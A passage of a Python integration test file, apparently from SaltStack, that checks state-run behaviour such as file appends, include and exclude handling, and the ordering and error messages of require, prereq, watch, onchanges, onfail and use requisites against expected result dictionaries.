with salt.utils.files.fopen(testfile, 'r') as fp_:
testfile_contents = salt.utils.stringutils.to_unicode(fp_.read())
self.assertMultiLineEqual(contents, testfile_contents)
def test_issue_1876_syntax_error(self):
'''
verify that we catch the following syntax error::
/tmp/salttest/issue-1876:
file:
- managed
- source: salt://testfile
file.append:
- text: foo
'''
testfile = os.path.join(TMP, 'issue-1876')
sls = self.run_function('state.sls', mods='issue-1876')
self.assertIn(
'ID \'{0}\' in SLS \'issue-1876\' contains multiple state '
'declarations of the same type'.format(testfile),
sls
)
def test_issue_1879_too_simple_contains_check(self):
expected = textwrap.dedent('''\
# set variable identifying the chroot you work in (used in the prompt below)
if [ -z "$debian_chroot" ] && [ -r /etc/debian_chroot ]; then
debian_chroot=$(cat /etc/debian_chroot)
fi
# enable bash completion in interactive shells
if [ -f /etc/bash_completion ] && ! shopt -oq posix; then
. /etc/bash_completion
fi
''')
if salt.utils.platform.is_windows():
new_contents = expected.splitlines()
expected = os.linesep.join(new_contents)
expected += os.linesep
testfile = os.path.join(TMP, 'issue-1879')
        # Delete if existing
if os.path.isfile(testfile):
os.unlink(testfile)
# Create the file
ret = self.run_function('state.sls', mods='issue-1879', timeout=120)
self.assertSaltTrueReturn(ret)
# The first append
ret = self.run_function(
'state.sls', mods='issue-1879.step-1', timeout=120
)
self.assertSaltTrueReturn(ret)
# The second append
ret = self.run_function(
'state.sls', mods='issue-1879.step-2', timeout=120
)
self.assertSaltTrueReturn(ret)
# Does it match?
try:
with salt.utils.files.fopen(testfile, 'r') as fp_:
contents = salt.utils.stringutils.to_unicode(fp_.read())
self.assertMultiLineEqual(expected, contents)
# Make sure we don't re-append existing text
ret = self.run_function(
'state.sls', mods='issue-1879.step-1', timeout=120
)
self.assertSaltTrueReturn(ret)
ret = self.run_function(
'state.sls', mods='issue-1879.step-2', timeout=120
)
self.assertSaltTrueReturn(ret)
with salt.utils.files.fopen(testfile, 'r') as fp_:
contents = salt.utils.stringutils.to_unicode(fp_.read())
self.assertMultiLineEqual(expected, contents)
except Exception:
if os.path.exists(testfile):
shutil.copy(testfile, testfile + '.bak')
raise
finally:
if os.path.exists(testfile):
os.unlink(testfile)
def test_include(self):
tempdir = tempfile.mkdtemp(dir=TMP)
self.addCleanup(shutil.rmtree, tempdir, ignore_errors=True)
pillar = {}
for path in ('include-test', 'to-include-test', 'exclude-test'):
pillar[path] = os.path.join(tempdir, path)
ret = self.run_function('state.sls', mods='include-test', pillar=pillar)
self.assertSaltTrueReturn(ret)
self.assertTrue(os.path.isfile(pillar['include-test']))
self.assertTrue(os.path.isfile(pillar['to-include-test']))
self.assertFalse(os.path.isfile(pillar['exclude-test']))
def test_exclude(self):
tempdir = tempfile.mkdtemp(dir=TMP)
self.addCleanup(shutil.rmtree, tempdir, ignore_errors=True)
pillar = {}
for path in ('include-test', 'exclude-test', 'to-include-test'):
pillar[path] = os.path.join(tempdir, path)
ret = self.run_function('state.sls', mods='exclude-test', pillar=pillar)
self.assertSaltTrueReturn(ret)
self.assertTrue(os.path.isfile(pillar['include-test']))
self.assertTrue(os.path.isfile(pillar['exclude-test']))
self.assertFalse(os.path.isfile(pillar['to-include-test']))
@skipIf(salt.utils.path.which_bin(KNOWN_BINARY_NAMES) is None, 'virtualenv not installed')
def test_issue_2068_template_str(self):
venv_dir = os.path.join(
TMP, 'issue-2068-template-str'
)
try:
ret = self.run_function(
'state.sls', mods='issue-2068-template-str-no-dot',
timeout=120
)
self.assertSaltTrueReturn(ret)
finally:
if os.path.isdir(venv_dir):
shutil.rmtree(venv_dir)
# Let's load the template from the filesystem. If running this state
# with state.sls works, so should using state.template_str
template_path = os.path.join(
os.path.dirname(os.path.dirname(__file__)),
'files', 'file', 'base', 'issue-2068-template-str-no-dot.sls'
)
with salt.utils.files.fopen(template_path, 'r') as fp_:
template = salt.utils.stringutils.to_unicode(fp_.read())
ret = self.run_function(
'state.template_str', [template], timeout=120
)
self.assertSaltTrueReturn(ret)
# Now using state.template
ret = self.run_function(
'state.template', [template_path], timeout=120
)
self.assertSaltTrueReturn(ret)
# Now the problematic #2068 including dot's
ret = self.run_function(
'state.sls', mods='issue-2068-template-str', timeout=120
)
self.assertSaltTrueReturn(ret)
# Let's load the template from the filesystem. If running this state
# with state.sls works, so should using state.template_str
template_path = os.path.join(
os.path.dirname(os.path.dirname(__file__)),
'files', 'file', 'base', 'issue-2068-template-str.sls'
)
with salt.utils.files.fopen(template_path, 'r') as fp_:
template = salt.utils.stringutils.to_unicode(fp_.read())
ret = self.run_function(
'state.template_str', [template], timeout=120
)
self.assertSaltTrueReturn(ret)
# Now using state.template
ret = self.run_function(
'state.template', [template_path], timeout=120
)
self.assertSaltTrueReturn(ret)
def test_template_invalid_items(self):
TEMPLATE = textwrap.dedent('''\
{0}:
- issue-2068-template-str
/tmp/test-template-invalid-items:
file:
- managed
- source: salt://testfile
''')
for item in ('include', 'exclude', 'extends'):
ret = self.run_function(
'state.template_str', [TEMPLATE.format(item)]
)
self.assertTrue(isinstance(ret, list))
self.assertNotEqual(ret, [])
self.assertEqual(
['The \'{0}\' declaration found on \'<template-str>\' is '
'invalid when rendering single templates'.format(item)],
ret
)
def test_pydsl(self):
'''
Test the basics of the pydsl
'''
ret = self.run_function('state.sls', mods='pydsl-1')
self.assertSaltTrueReturn(ret)
def test_issues_7905_and_8174_sls_syntax_error(self):
'''
Call sls file with yaml syntax error.
        Ensure these errors are detected and presented to the user without
stack traces.
'''
ret = self.run_function('state.sls', mods='syntax.badlist')
self.assertEqual(ret, [
'State \'A\' in SLS \'syntax.badlist\' is not formed as a list'
])
ret = self.run_function('state.sls', mods='syntax.badlist2')
self.assertEqual(ret, [
'State \'C\' in SLS \'syntax.badlist2\' is not formed as a list'
])
def test_requisites_mixed_require_prereq_use(self):
'''
Call sls file containing several requisites.
'''
expected_simple_result = {
'cmd_|-A_|-echo A_|-run': {
'__run_num__': 2,
'comment': 'Command "echo A" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B_|-run': {
'__run_num__': 1,
'comment': 'Command "echo B" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C_|-run': {
'__run_num__': 0,
'comment': 'Command "echo C" run',
'result': True,
'changes': True}
}
expected_result = {
'cmd_|-A_|-echo A fifth_|-run': {
'__run_num__': 4,
'comment': 'Command "echo A fifth" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B third_|-run': {
'__run_num__': 2,
'comment': 'Command "echo B third" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo C second" run',
'result': True,
'changes': True},
'cmd_|-D_|-echo D first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo D first" run',
'result': True,
'changes': True},
'cmd_|-E_|-echo E fourth_|-run': {
'__run_num__': 3,
'comment': 'Command "echo E fourth" run',
'result': True,
'changes': True}
}
expected_req_use_result = {
'cmd_|-A_|-echo A_|-run': {
'__run_num__': 1,
'comment': 'Command "echo A" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B_|-run': {
'__run_num__': 4,
'comment': 'Command "echo B" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C_|-run': {
'__run_num__': 0,
'comment': 'Command "echo C" run',
'result': True,
'changes': True},
'cmd_|-D_|-echo D_|-run': {
'__run_num__': 5,
'comment': 'Command "echo D" run',
'result': True,
'changes': True},
'cmd_|-E_|-echo E_|-run': {
'__run_num__': 2,
'comment': 'Command "echo E" run',
'result': True,
'changes': True},
'cmd_|-F_|-echo F_|-run': {
'__run_num__': 3,
'comment': 'Command "echo F" run',
'result': True,
'changes': True}
}
ret = self.run_function('state.sls', mods='requisites.mixed_simple')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_simple_result, result)
# test Traceback recursion prereq+require #8785
# TODO: this is actually failing badly
#ret = self.run_function('state.sls', mods='requisites.prereq_require_recursion_error2')
#self.assertEqual(
# ret,
# ['A recursive requisite was found, SLS "requisites.prereq_require_recursion_error2" ID "B" ID "A"']
#)
# test Infinite recursion prereq+require #8785 v2
# TODO: this is actually failing badly
#ret = self.run_function('state.sls', mods='requisites.prereq_require_recursion_error3')
#self.assertEqual(
# ret,
# ['A recursive requisite was found, SLS "requisites.prereq_require_recursion_error2" ID "B" ID "A"']
#)
# test Infinite recursion prereq+require #8785 v3
# TODO: this is actually failing badly, and expected result is maybe not a recursion
#ret = self.run_function('state.sls', mods='requisites.prereq_require_recursion_error4')
#self.assertEqual(
# ret,
# ['A recursive requisite was found, SLS "requisites.prereq_require_recursion_error2" ID "B" ID "A"']
#)
        # an undetected infinite loop prevents this test from running...
# TODO: this is actually failing badly
#ret = self.run_function('state.sls', mods='requisites.mixed_complex1')
#result = self.normalize_ret(ret)
#self.assertEqual(expected_result, result)
def test_watch_in(self):
'''
test watch_in requisite when there is a success
'''
ret = self.run_function('state.sls', mods='requisites.watch_in')
changes = 'test_|-return_changes_|-return_changes_|-succeed_with_changes'
watch = 'test_|-watch_states_|-watch_states_|-succeed_without_changes'
self.assertEqual(ret[changes]['__run_num__'], 0)
self.assertEqual(ret[watch]['__run_num__'], 2)
self.assertEqual('Watch statement fired.', ret[watch]['comment'])
self.assertEqual('Something pretended to change',
ret[changes]['changes']['testing']['new'])
def test_watch_in_failure(self):
'''
test watch_in requisite when there is a failure
'''
ret = self.run_function('state.sls', mods='requisites.watch_in_failure')
fail = 'test_|-return_changes_|-return_changes_|-fail_with_changes'
watch = 'test_|-watch_states_|-watch_states_|-succeed_without_changes'
self.assertEqual(False, ret[fail]['result'])
self.assertEqual('One or more requisite failed: requisites.watch_in_failure.return_changes',
ret[watch]['comment'])
def normalize_ret(self, ret):
'''
Normalize the return to the format that we'll use for result checking
'''
result = {}
for item, descr in six.iteritems(ret):
result[item] = {
'__run_num__': descr['__run_num__'],
'comment': descr['comment'],
'result': descr['result'],
                'changes': descr['changes'] != {}  # whether there were any changes
}
return result
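    # Example (hypothetical values): normalize_ret maps
    #   {'cmd_|-A_|-echo A_|-run': {'__run_num__': 0, 'comment': 'Command "echo A" run',
    #                               'result': True, 'changes': {'stdout': 'A'}, 'duration': 12.3}}
    # to
    #   {'cmd_|-A_|-echo A_|-run': {'__run_num__': 0, 'comment': 'Command "echo A" run',
    #                               'result': True, 'changes': True}}
    # dropping volatile fields (duration, start_time) so the expected dicts in
    # these tests stay stable across runs.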
def test_requisites_require_ordering_and_errors(self):
'''
Call sls file containing several require_in and require.
Ensure that some of them are failing and that the order is right.
'''
expected_result = {
'cmd_|-A_|-echo A fifth_|-run': {
'__run_num__': 4,
'comment': 'Command "echo A fifth" run',
'result': True,
'changes': True,
},
'cmd_|-B_|-echo B second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo B second" run',
'result': True,
'changes': True,
},
'cmd_|-C_|-echo C third_|-run': {
'__run_num__': 2,
'comment': 'Command "echo C third" run',
'result': True,
'changes': True,
},
'cmd_|-D_|-echo D first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo D first" run',
'result': True,
'changes': True,
},
'cmd_|-E_|-echo E fourth_|-run': {
'__run_num__': 3,
'comment': 'Command "echo E fourth" run',
'result': True,
'changes': True,
},
'cmd_|-F_|-echo F_|-run': {
'__run_num__': 5,
'comment': 'The following requisites were not found:\n'
+ ' require:\n'
+ ' foobar: A\n',
'result': False,
'changes': False,
},
'cmd_|-G_|-echo G_|-run': {
'__run_num__': 6,
'comment': 'The following requisites were not found:\n'
+ ' require:\n'
+ ' cmd: Z\n',
'result': False,
'changes': False,
},
'cmd_|-H_|-echo H_|-run': {
'__run_num__': 7,
'comment': 'The following requisites were not found:\n'
+ ' require:\n'
+ ' cmd: Z\n',
'result': False,
'changes': False,
}
}
ret = self.run_function('state.sls', mods='requisites.require')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result, result)
ret = self.run_function('state.sls', mods='requisites.require_error1')
self.assertEqual(ret, [
"Cannot extend ID 'W' in 'base:requisites.require_error1'. It is not part of the high state.\nThis is likely due to a missing include statement or an incorrectly typed ID.\nEnsure that a state with an ID of 'W' is available\nin environment 'base' and to SLS 'requisites.require_error1'"
])
# issue #8235
# FIXME: Why is require enforcing list syntax while require_in does not?
        # And why is it prevented?
# Currently this state fails, should return C/B/A
result = {}
ret = self.run_function('state.sls', mods='requisites.require_simple_nolist')
self.assertEqual(ret, [
'The require statement in state \'B\' in SLS '
+ '\'requisites.require_simple_nolist\' needs to be formed as a list'
])
# commented until a fix is made for issue #8772
# TODO: this test actually fails
#ret = self.run_function('state.sls', mods='requisites.require_error2')
#self.assertEqual(ret, [
# 'Cannot extend state foobar for ID A in "base:requisites.require_error2".'
# + ' It is not part of the high state.'
#])
ret = self.run_function('state.sls', mods='requisites.require_recursion_error1')
self.assertEqual(
ret,
['A recursive requisite was found, SLS "requisites.require_recursion_error1" ID "B" ID "A"']
)
def test_requisites_require_any(self):
'''
        Call sls file containing require_any requisites.
Ensure that some of them are failing and that the order is right.
'''
expected_result = {
'cmd_|-A_|-echo A_|-run': {
'__run_num__': 3,
'comment': 'Command "echo A" run',
'result': True,
'changes': True,
},
'cmd_|-B_|-echo B_|-run': {
'__run_num__': 0,
'comment': 'Command "echo B" run',
'result': True,
'changes': True,
},
'cmd_|-C_|-/bin/false_|-run': {
'__run_num__': 1,
'comment': 'Command "/bin/false" run',
'result': False,
'changes': True,
},
'cmd_|-D_|-echo D_|-run': {
'__run_num__': 2,
'comment': 'Command "echo D" run',
'result': True,
'changes': True,
},
}
ret = self.run_function('state.sls', mods='requisites.require_any')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result, result)
def test_requisites_require_any_fail(self):
'''
        Call sls file containing require_any requisites.
        Ensure the failure propagates to the requiring state.
'''
ret = self.run_function('state.sls', mods='requisites.require_any_fail')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertIn('One or more requisite failed',
result['cmd_|-D_|-echo D_|-run']['comment'])
def test_requisites_watch_any(self):
'''
        Call sls file containing watch_any requisites.
Ensure that some of them are failing and that the order is right.
'''
if salt.utils.platform.is_windows():
cmd_true = 'exit'
cmd_false = 'exit /B 1'
else:
cmd_true = 'true'
cmd_false = 'false'
expected_result = {
'cmd_|-A_|-{0}_|-wait'.format(cmd_true): {
'__run_num__': 4,
'comment': 'Command "{0}" run'.format(cmd_true),
'result': True,
'changes': True,
},
'cmd_|-B_|-{0}_|-run'.format(cmd_true): {
'__run_num__': 0,
'comment': 'Command "{0}" run'.format(cmd_true),
'result': True,
'changes': True,
},
'cmd_|-C_|-{0}_|-run'.format(cmd_false): {
'__run_num__': 1,
'comment': 'Command "{0}" run'.format(cmd_false),
'result': False,
'changes': True,
},
'cmd_|-D_|-{0}_|-run'.format(cmd_true): {
'__run_num__': 2,
'comment': 'Command "{0}" run'.format(cmd_true),
'result': True,
'changes': True,
},
'cmd_|-E_|-{0}_|-wait'.format(cmd_true): {
'__run_num__': 9,
'comment': 'Command "{0}" run'.format(cmd_true),
'result': True,
'changes': True,
},
'cmd_|-F_|-{0}_|-run'.format(cmd_true): {
'__run_num__': 5,
'comment': 'Command "{0}" run'.format(cmd_true),
'result': True,
'changes': True,
},
'cmd_|-G_|-{0}_|-run'.format(cmd_false): {
'__run_num__': 6,
'comment': 'Command "{0}" run'.format(cmd_false),
'result': False,
'changes': True,
},
'cmd_|-H_|-{0}_|-run'.format(cmd_false): {
'__run_num__': 7,
'comment': 'Command "{0}" run'.format(cmd_false),
'result': False,
'changes': True,
},
}
ret = self.run_function('state.sls', mods='requisites.watch_any')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result, result)
def test_requisites_watch_any_fail(self):
'''
        Call sls file containing watch_any requisites.
        Ensure the failure propagates to the watching state.
'''
ret = self.run_function('state.sls', mods='requisites.watch_any_fail')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertIn('One or more requisite failed',
result['cmd_|-A_|-true_|-wait']['comment'])
def test_requisites_onchanges_any(self):
'''
        Call sls file containing onchanges_any requisites.
        Ensure that some of them are failing and that the order is right.
'''
expected_result = {
'cmd_|-another_changing_state_|-echo "Changed!"_|-run': {
'__run_num__': 1,
'changes': True,
'comment': 'Command "echo "Changed!"" run',
'result': True
},
'cmd_|-changing_state_|-echo "Changed!"_|-run': {
'__run_num__': 0,
'changes': True,
'comment': 'Command "echo "Changed!"" run',
'result': True
},
'cmd_|-test_one_changing_states_|-echo "Success!"_|-run': {
'__run_num__': 4,
'changes': True,
'comment': 'Command "echo "Success!"" run',
'result': True
},
'cmd_|-test_two_non_changing_states_|-echo "Should not run"_|-run': {
'__run_num__': 5,
'changes': False,
'comment': 'State was not run because none of the onchanges reqs changed',
'result': True
},
'pip_|-another_non_changing_state_|-mock_|-installed': {
'__run_num__': 3,
'changes': False,
'comment': 'Python package mock was already installed\nAll packages were successfully installed',
'result': True
},
'pip_|-non_changing_state_|-mock_|-installed': {
'__run_num__': 2,
'changes': False,
'comment': 'Python package mock was already installed\nAll packages were successfully installed',
'result': True
}
}
ret = self.run_function('state.sls', mods='requisites.onchanges_any')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result, result)
def test_requisites_onfail_any(self):
'''
        Call sls file containing onfail_any requisites.
        Ensure that some of them are failing and that the order is right.
'''
expected_result = {
'cmd_|-a_|-exit 0_|-run': {
'__run_num__': 0,
'changes': True,
'comment': 'Command "exit 0" run',
'result': True
},
'cmd_|-b_|-exit 1_|-run': {
'__run_num__': 1,
'changes': True,
'comment': 'Command "exit 1" run',
'result': False
},
'cmd_|-c_|-exit 0_|-run': {
'__run_num__': 2,
'changes': True,
'comment': 'Command "exit 0" run',
'result': True
},
'cmd_|-d_|-echo itworked_|-run': {
'__run_num__': 3,
'changes': True,
'comment': 'Command "echo itworked" run',
'result': True},
'cmd_|-e_|-exit 0_|-run': {
'__run_num__': 4,
'changes': True,
'comment': 'Command "exit 0" run',
'result': True
},
'cmd_|-f_|-exit 0_|-run': {
'__run_num__': 5,
'changes': True,
'comment': 'Command "exit 0" run',
'result': True
},
'cmd_|-g_|-exit 0_|-run': {
'__run_num__': 6,
'changes': True,
'comment': 'Command "exit 0" run',
'result': True
},
'cmd_|-h_|-echo itworked_|-run': {
'__run_num__': 7,
'changes': False,
'comment': 'State was not run because onfail req did not change',
'result': True
}
}
ret = self.run_function('state.sls', mods='requisites.onfail_any')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result, result)
def test_requisites_full_sls(self):
'''
        Test the sls special command in requisites
'''
expected_result = {
'cmd_|-A_|-echo A_|-run': {
'__run_num__': 2,
'comment': 'Command "echo A" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B_|-run': {
'__run_num__': 0,
'comment': 'Command "echo B" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C_|-run': {
'__run_num__': 1,
'comment': 'Command "echo C" run',
'result': True,
'changes': True},
}
ret = self.run_function('state.sls', mods='requisites.fullsls_require')
self.assertReturnNonEmptySaltType(ret)
result = self.normalize_ret(ret)
self.assertEqual(expected_result, result)
# issue #8233: traceback on prereq sls
# TODO: not done
#ret = self.run_function('state.sls', mods='requisites.fullsls_prereq')
#self.assertEqual(['sls command can only be used with require requisite'], ret)
def test_requisites_require_no_state_module(self):
'''
Call sls file containing several require_in and require.
Ensure that some of them are failing and that the order is right.
'''
expected_result = {
'cmd_|-A_|-echo A fifth_|-run': {
'__run_num__': 4,
'comment': 'Command "echo A fifth" run',
'result': True,
'changes': True,
},
'cmd_|-B_|-echo B second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo B second" run',
'result': True,
'changes': True,
},
'cmd_|-C_|-echo C third_|-run': {
'__run_num__': 2,
'comment': 'Command "echo C third" run',
'result': True,
'changes': True,
},
'cmd_|-D_|-echo D first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo D first" run',
'result': True,
'changes': True,
},
'cmd_|-E_|-echo E fourth_|-run': {
'__run_num__': 3,
'comment': 'Command "echo E fourth" run',
'result': True,
'changes': True,
},
'cmd_|-G_|-echo G_|-run': {
'__run_num__': 5,
'comment': 'The following requisites were not found:\n'
+ ' require:\n'
+ ' id: Z\n',
'result': False,
'changes': False,
},
'cmd_|-H_|-echo H_|-run': {
'__run_num__': 6,
'comment': 'The following requisites were not found:\n'
+ ' require:\n'
+ ' id: Z\n',
'result': False,
'changes': False,
}
}
ret = self.run_function('state.sls', mods='requisites.require_no_state_module')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result, result)
def test_requisites_prereq_simple_ordering_and_errors(self):
'''
Call sls file containing several prereq_in and prereq.
Ensure that some of them are failing and that the order is right.
'''
expected_result_simple = {
'cmd_|-A_|-echo A third_|-run': {
'__run_num__': 2,
'comment': 'Command "echo A third" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo B first" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo C second" run',
'result': True,
'changes': True},
'cmd_|-I_|-echo I_|-run': {
'__run_num__': 3,
'comment': 'The following requisites were not found:\n'
+ ' prereq:\n'
+ ' cmd: Z\n',
'result': False,
'changes': False},
'cmd_|-J_|-echo J_|-run': {
'__run_num__': 4,
'comment': 'The following requisites were not found:\n'
+ ' prereq:\n'
+ ' foobar: A\n',
'result': False,
'changes': False}
}
expected_result_simple_no_state_module = {
'cmd_|-A_|-echo A third_|-run': {
'__run_num__': 2,
'comment': 'Command "echo A third" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo B first" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo C second" run',
'result': True,
'changes': True},
'cmd_|-I_|-echo I_|-run': {
'__run_num__': 3,
'comment': 'The following requisites were not found:\n'
+ ' prereq:\n'
+ ' id: Z\n',
'result': False,
'changes': False}
}
expected_result_simple2 = {
'cmd_|-A_|-echo A_|-run': {
'__run_num__': 1,
'comment': 'Command "echo A" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B_|-run': {
'__run_num__': 2,
'comment': 'Command "echo B" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C_|-run': {
'__run_num__': 0,
'comment': 'Command "echo C" run',
'result': True,
'changes': True},
'cmd_|-D_|-echo D_|-run': {
'__run_num__': 3,
'comment': 'Command "echo D" run',
'result': True,
'changes': True},
'cmd_|-E_|-echo E_|-run': {
'__run_num__': 4,
'comment': 'Command "echo E" run',
'result': True,
'changes': True}
}
expected_result_simple3 = {
'cmd_|-A_|-echo A first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo A first" run',
'result': True,
'changes': True,
},
'cmd_|-B_|-echo B second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo B second" run',
'result': True,
'changes': True,
},
'cmd_|-C_|-echo C third_|-wait': {
'__run_num__': 2,
'comment': '',
'result': True,
'changes': False,
}
}
expected_result_complex = {
'cmd_|-A_|-echo A fourth_|-run': {
'__run_num__': 3,
'comment': 'Command "echo A fourth" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo B first" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo C second" run',
'result': True,
'changes': True},
'cmd_|-D_|-echo D third_|-run': {
'__run_num__': 2,
'comment': 'Command "echo D third" run',
'result': True,
'changes': True},
}
ret = self.run_function('state.sls', mods='requisites.prereq_simple')
self.assertReturnNonEmptySaltType(ret)
result = self.normalize_ret(ret)
self.assertEqual(expected_result_simple, result)
# same test, but not using lists in yaml syntax
# TODO: issue #8235, prereq ignored when not used in list syntax
# Currently fails badly with :
# TypeError encountered executing state.sls: string indices must be integers, not str.
#expected_result_simple.pop('cmd_|-I_|-echo I_|-run')
#expected_result_simple.pop('cmd_|-J_|-echo J_|-run')
#ret = self.run_function('state.sls', mods='requisites.prereq_simple_nolist')
#result = self.normalize_ret(ret)
#self.assertEqual(expected_result_simple, result)
ret = self.run_function('state.sls', mods='requisites.prereq_simple2')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result_simple2, result)
ret = self.run_function('state.sls', mods='requisites.prereq_simple3')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result_simple3, result)
#ret = self.run_function('state.sls', mods='requisites.prereq_error_nolist')
#self.assertEqual(
# ret,
# ['Cannot extend ID Z in "base:requisites.prereq_error_nolist".'
# + ' It is not part of the high state.']
#)
ret = self.run_function('state.sls', mods='requisites.prereq_compile_error1')
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(
ret['cmd_|-B_|-echo B_|-run']['comment'],
'The following requisites were not found:\n'
+ ' prereq:\n'
+ ' foobar: A\n'
)
ret = self.run_function('state.sls', mods='requisites.prereq_compile_error2')
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(
ret['cmd_|-B_|-echo B_|-run']['comment'],
'The following requisites were not found:\n'
+ ' prereq:\n'
+ ' foobar: C\n'
)
ret = self.run_function('state.sls', mods='requisites.prereq_complex')
result = self.normalize_ret(ret)
self.assertEqual(expected_result_complex, result)
# issue #8210 : prereq recursion undetected
# TODO: this test fails
#ret = self.run_function('state.sls', mods='requisites.prereq_recursion_error')
#self.assertEqual(
# ret,
# ['A recursive requisite was found, SLS "requisites.prereq_recursion_error" ID "B" ID "A"']
#)
ret = self.run_function('state.sls', mods='requisites.prereq_simple_no_state_module')
result = self.normalize_ret(ret)
self.assertEqual(expected_result_simple_no_state_module, result)
def test_infinite_recursion_sls_prereq(self):
ret = self.run_function('state.sls', mods='requisites.prereq_sls_infinite_recursion')
self.assertSaltTrueReturn(ret)
def test_requisites_use(self):
'''
Call sls file containing several use_in and use.
'''
# TODO issue #8235 & #8774 some examples are still commented in the test file
ret = self.run_function('state.sls', mods='requisites.use')
self.assertReturnNonEmptySaltType(ret)
for item, descr in six.iteritems(ret):
self.assertEqual(descr['comment'], 'onlyif condition is false')
# TODO: issue #8802 : use recursions undetected
# issue is closed as use does not actually inherit requisites
        # if chain-use is added after #8774 resolution, these tests might become useful
#ret = self.run_function('state.sls', mods='requisites.use_recursion')
#self.assertEqual(ret, [
# 'A recursive requisite was found, SLS "requisites.use_recursion"'
# + ' ID "B" ID "A"'
#])
#ret = self.run_function('state.sls', mods='requisites.use_recursion2')
#self.assertEqual(ret, [
# 'A recursive requisite was found, SLS "requisites.use_recursion2"'
# + ' ID "C" ID "A"'
#])
#ret = self.run_function('state.sls', mods='requisites.use_auto_recursion')
#self.assertEqual(ret, [
# 'A recursive requisite was found, SLS "requisites.use_recursion"'
# + ' ID "A" ID "A"'
#])
def test_requisites_use_no_state_module(self):
'''
Call sls file containing several use_in and use.
'''
ret = self.run_function('state.sls', mods='requisites.use_no_state_module')
self.assertReturnNonEmptySaltType(ret)
for item, descr in six.iteritems(ret):
self.assertEqual(descr['comment'], 'onlyif condition is false')
def test_get_file_from_env_in_top_match(self):
tgt = os.path.join(TMP, 'prod-cheese-file')
try:
ret = self.run_function(
'state.highstate', minion_tgt='sub_minion'
)
self.assertSaltTrueReturn(ret)
self.assertTrue(os.path.isfile(tgt))
with salt.utils.files.fopen(tgt, 'r') as cheese:
data = salt.utils.stringutils.to_unicode(cheese.read())
self.assertIn('Gromit', data)
self.assertIn('Comte', data)
finally:
if os.path.islink(tgt):
os.unlink(tgt)
# onchanges tests
def test_onchanges_requisite(self):
'''
Tests a simple state using the onchanges requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onchanges_simple')
# First, test the result of the state run when changes are expected to happen
test_data = state_run['cmd_|-test_changing_state_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
# Then, test the result of the state run when changes are not expected to happen
test_data = state_run['cmd_|-test_non_changing_state_|-echo "Should not run"_|-run']['comment']
expected_result = 'State was not run because none of the onchanges reqs changed'
self.assertIn(expected_result, test_data)
def test_onchanges_requisite_multiple(self):
'''
Tests a simple state using the onchanges requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls',
mods='requisites.onchanges_multiple')
# First, test the result of the state run when two changes are expected to happen
test_data = state_run['cmd_|-test_two_changing_states_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
# Then, test the result of the state run when two changes are not expected to happen
test_data = state_run['cmd_|-test_two_non_changing_states_|-echo "Should not run"_|-run']['comment']
expected_result = 'State was not run because none of the onchanges reqs changed'
self.assertIn(expected_result, test_data)
# Finally, test the result of the state run when only one of the onchanges requisites changes.
test_data = state_run['cmd_|-test_one_changing_state_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
def test_onchanges_in_requisite(self):
'''
Tests a simple state using the onchanges_in requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onchanges_in_simple')
# First, test the result of the state run of when changes are expected to happen
test_data = state_run['cmd_|-test_changes_expected_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
# Then, test the result of the state run when changes are not expected to happen
test_data = state_run['cmd_|-test_changes_not_expected_|-echo "Should not run"_|-run']['comment']
expected_result = 'State was not run because none of the onchanges reqs changed'
